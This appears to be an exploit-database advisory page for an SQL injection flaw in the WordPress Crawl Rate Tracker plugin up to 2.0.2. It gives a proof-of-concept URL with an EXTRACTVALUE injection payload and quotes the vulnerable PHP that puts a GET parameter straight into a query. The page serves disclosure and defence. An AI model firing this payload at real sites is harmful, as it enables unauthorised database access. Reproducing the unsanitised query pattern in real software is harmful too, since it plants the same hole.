header-logo
Suggest Exploit
vendor:
Crawl Rate Tracker plugin
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Crawl Rate Tracker plugin
Affected Version From: 2.0.0
Affected Version To: 2.0.2
Patch Exists: NO
Related CWE:
CPE: a:wordpress:crawl_rate_tracker:2.0.2
Metasploit:
Other Scripts:
Platforms Tested: WordPress
2011

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability

The WordPress Crawl Rate Tracker plugin <= 2.0.2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted request to the sbtracking-chart-data.php file. This allows the attacker to extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, users should ensure that magic_quotes is turned on in their WordPress installation. Additionally, users should update to the latest version of the Crawl Rate Tracker plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig
{
    public function tracking_bot_report_chart_data()
    {
        ...
        if($_GET['page_url'] != '')
        {
            $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
            ...

if ($_GET['chart_data']==1) {
    ...
    $chartData = new b3_chartData();
    echo $chartData->tracking_bot_report_chart_data();

Navigation

Suggest Exploit

Services By CQR